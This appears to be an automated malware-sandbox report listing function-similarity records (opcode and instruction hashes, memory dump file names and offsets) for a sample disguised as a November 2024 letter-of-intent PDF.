                                                                                      • Opcode Fuzzy Hash: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                      • Instruction Fuzzy Hash: 815108B5A00619EFCB04CF58C881A5AFBF5FF08354B298699E818DB351D335ED62CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98f37ac8cbf7d666665b33e1975437584e3d75151828c6c76322629aa1b07c53
                                                                                      • Instruction ID: fcd9ff8159d58037d788d9ac6fad9db257e82911c810e41d4f92ade04ac2bbd0
                                                                                      • Opcode Fuzzy Hash: 98f37ac8cbf7d666665b33e1975437584e3d75151828c6c76322629aa1b07c53
                                                                                      • Instruction Fuzzy Hash: 57416776D0032AABDB159BA49884AAFB7BCAF04754F450A66EB00F7310DB75DD01CBE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                      • Instruction ID: eec3236ad05a792a45aa85912d932903b6a27f6e76144e514d25d96ef83c26c2
                                                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                      • Instruction Fuzzy Hash: D2514875600606EFDB15CF24C580A56BBF9FF45308B1984EAE9089F226E771E946CF90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                      • Instruction ID: a543f6499a43d413f72b4b2ebaacf078061cee24c4ddc5798439923288320e0d
                                                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                      • Instruction Fuzzy Hash: 2D313875604306CFC700CF19C480946BBF5FF89354B2589A9EA589B319EB30ED06CF91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a17a8bb9c880f94c0eadee94bd9265e16470e842167f53be2872ed620f425b5f
                                                                                      • Instruction ID: 6bc47f702b21cd77fd91fcc7b2f880bbd8fc9a0f5c8924b69a22da29926d6160
                                                                                      • Opcode Fuzzy Hash: a17a8bb9c880f94c0eadee94bd9265e16470e842167f53be2872ed620f425b5f
                                                                                      • Instruction Fuzzy Hash: 9D2100B26043199BE710EF68C950B0F77E8AF44754F010C6AFB149B690EB70D800CFA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9345701869807e4b376c96fd79ced99c65470ccf1edf2c1e196986f9eb0fe73e
                                                                                      • Instruction ID: 12e7f3ea71f5d4aeb790a13da09f87189d3e6377653370c3069e46d534296286
                                                                                      • Opcode Fuzzy Hash: 9345701869807e4b376c96fd79ced99c65470ccf1edf2c1e196986f9eb0fe73e
                                                                                      • Instruction Fuzzy Hash: 8121917D241B91CFE316DB29C8A0B61B3E4FB41B48F454896EE8287651DB39D8C2DB20
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                      • Instruction ID: 664096b3570aac95c181c71330ea12acac280a2a704e8ca8c9e3e92048cae0d1
                                                                                      • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                      • Instruction Fuzzy Hash: AF21C272200300DFDB19CF56C440B56B7E9EF85364F15466DE606CB290EBB4E841CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f563e229ed24d4471e089fd88080016d2221d8090c4690419a6c7528e8de920
                                                                                      • Instruction ID: 9e285491bdcd3653093d46ffb50964b0f9c8abfc817912cac72d1da4b59e22eb
                                                                                      • Opcode Fuzzy Hash: 1f563e229ed24d4471e089fd88080016d2221d8090c4690419a6c7528e8de920
                                                                                      • Instruction Fuzzy Hash: F12138312047AEDBF7256B25CC10B2A77E6AB40360F140F59EA564A5E0DB31E841DF52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d385e7943294503daa3e8172c7c0ff9b1ccf6277e7ca9781c2751a2531aa0c24
                                                                                      • Instruction ID: 51e15e5e6b13e1baca9a1f93c6b6f81a4e67603672e62c60812331ca56a666d4
                                                                                      • Opcode Fuzzy Hash: d385e7943294503daa3e8172c7c0ff9b1ccf6277e7ca9781c2751a2531aa0c24
                                                                                      • Instruction Fuzzy Hash: 5E212531A097418BE311CF298940B0FB7E9AFC2B64F144DADF8E683140DB70E8458F91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                      • Instruction ID: 670eabe95c19d9991649dd9970d327529d3d9f434cc668b9ba41f5ff7cb78787
                                                                                      • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                      • Instruction Fuzzy Hash: 3A21C272644704ABE3119F2CDC41B8BBBE5EF88760F04096AF958973A0DB70D8018BE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                                      • Instruction ID: 5564fbd5faea2153667b638c3b8a6900cef03cac56e401fb23972c252cb28eb7
                                                                                      • Opcode Fuzzy Hash: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                                      • Instruction Fuzzy Hash: 41210576900712DFD718CF64C490669F3F4FF44324F948AAAC9A597650EB70AA41CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8074cdbc68b5288c7f1d0c318c443b61181f71f811655a83a0f60f19fc638a8b
                                                                                      • Instruction ID: 751ccae2ee098846342097120ec798af518588c6f6b8f0e110f96eef8c53be01
                                                                                      • Opcode Fuzzy Hash: 8074cdbc68b5288c7f1d0c318c443b61181f71f811655a83a0f60f19fc638a8b
                                                                                      • Instruction Fuzzy Hash: 17210136705781DBE716CB58C860B9573AAFB89B94F0409A5EE408B7A1EA76D800C751
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6d952abde822ecab52083c74f0eb280f3333d65a4f0f8f939988f1c52d6981c
                                                                                      • Instruction ID: dd7fa0bfdd90c89f68f4e347d82cc3a541fcd9b65c9d85dd00e759fb47ea380a
                                                                                      • Opcode Fuzzy Hash: f6d952abde822ecab52083c74f0eb280f3333d65a4f0f8f939988f1c52d6981c
                                                                                      • Instruction Fuzzy Hash: E7215572510A44EFC722DF68CA50F19B7F5FF08708F154968E2169A6A2CBB4A852CF44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                      • Instruction ID: 052fa271f732377849c2bf2a48b8137481a3dc298246d81b89b0c9b547473606
                                                                                      • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                      • Instruction Fuzzy Hash: A321F376700785EFE7029F96CA44B1277E9AF44B84F1909A1EE068B7A2EB75DC40C750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43328a255aad0290ac22c805be68ed26d37e3c6a1fab167c74c0b78b52fc36da
                                                                                      • Instruction ID: d805f5b4457bbf23e21924a0550bde5a69330c2fd3bc771ab37eab998a69d846
                                                                                      • Opcode Fuzzy Hash: 43328a255aad0290ac22c805be68ed26d37e3c6a1fab167c74c0b78b52fc36da
                                                                                      • Instruction Fuzzy Hash: 93117B796023249BEB25DF68C850FAAFBF1FF16760F500C66EB4297240DA70C841C760
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d524ad5be741dca8eeaebd7f82f985cac4802be9f955332c5109626d41edfb4
                                                                                      • Instruction ID: ff5c2d888e8f5aaa3af1c5ed560792be73a435827e79b0b8e35abe3ab46cc387
                                                                                      • Opcode Fuzzy Hash: 3d524ad5be741dca8eeaebd7f82f985cac4802be9f955332c5109626d41edfb4
                                                                                      • Instruction Fuzzy Hash: 8601B172241314AFD3218A21CC54E56B7AEEB817A0F25892AE7298B780DA71DC01CBD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                                      • Instruction ID: d97506283931ee83aaa815bf91cf4ba9d3176ac31be62acb05f1654eddb68a06
                                                                                      • Opcode Fuzzy Hash: b010affa2c9c17b8fcbaf56ed93a20b011c1e6f153da428dac7c50b91225a3f0
                                                                                      • Instruction Fuzzy Hash: BC01B536142650BFD3228F45CE50F16BBA9FB52B64F550450BA815BAB0C3A5E890CB84
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9b1dc1b105aa6ba71b88e9e8f439b1c0d0b3a94c4798331be269ca73659da60
                                                                                      • Instruction ID: 1e4b87fda7d496d4b8e815c6a8bc0aef3c2c771405779fe7dc3e4a6814283a2b
                                                                                      • Opcode Fuzzy Hash: a9b1dc1b105aa6ba71b88e9e8f439b1c0d0b3a94c4798331be269ca73659da60
                                                                                      • Instruction Fuzzy Hash: 1A116171A00348ABCB00DFA9D855E9EBBF8EF44740F444466B900EB390DA74DA01CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                      • Instruction ID: d68d0e2a64a698af0ad0a8c2561090a69d418356463e6af7c05156a0ade6b87a
                                                                                      • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                      • Instruction Fuzzy Hash: F511AD72910B01DFE3228F15C880B12B3E9FF407A6F158C6CEA994B6A6C775E880CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                      • Instruction ID: e0527e17952072b2135801d625867c9e637ad3a868e8eb8dced41b20cb2ac2f2
                                                                                      • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                      • Instruction Fuzzy Hash: 6B01D672740215E7CF068A9BDE40E9B3B6C9F84784F100829BB06D7160EEB0DD41C760
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                      • Instruction ID: 1274ef70627e684446c905235b6e51b3083552dc86dcae09011c980fa34d7364
                                                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                      • Instruction Fuzzy Hash: 540142B6A003169BE7058A54E800F9D73A9EFC4B38F14895AFF208B288DF74D840CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2dbbd352a7919e53594da01e6888f5c431dfb027faaebd3b8b8492b277de2b8
                                                                                      • Instruction ID: dbd055b06517cee106a2bbee9d5360027294a1a995ec838e4c3faa2865883617
                                                                                      • Opcode Fuzzy Hash: b2dbbd352a7919e53594da01e6888f5c431dfb027faaebd3b8b8492b277de2b8
                                                                                      • Instruction Fuzzy Hash: 65017171A00348EFDB04DFA9D855FAEBBF8EF44700F444466BA00EB290DAB4DA01CB95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f130e80e173a05c979de967f1e54141ec3a6cffadc93af2a88e0010f9473560
                                                                                      • Instruction ID: 88bcfae8f169a89e6eb653d8264ef67ed1876f7820c2ba3961ff5f07f960b3d6
                                                                                      • Opcode Fuzzy Hash: 0f130e80e173a05c979de967f1e54141ec3a6cffadc93af2a88e0010f9473560
                                                                                      • Instruction Fuzzy Hash: 01015271A10248ABDB04DFA9D845FAEBBB8EF44710F444466BA00EB281DAB4DA01CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 31bc1d16340ea84d680b9fad651e5b6de729f34d811b314e58f36d429fcc10ba
                                                                                      • Instruction ID: d75256dbab1b2dd6cd8f0631902b545faa3fe9b7a63dabadfed08d824548c78f
                                                                                      • Opcode Fuzzy Hash: 31bc1d16340ea84d680b9fad651e5b6de729f34d811b314e58f36d429fcc10ba
                                                                                      • Instruction Fuzzy Hash: 480171B1A11348EBDB04DFA9D855FAEBBF8EF44750F444466B940EB380DAB4DA01CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
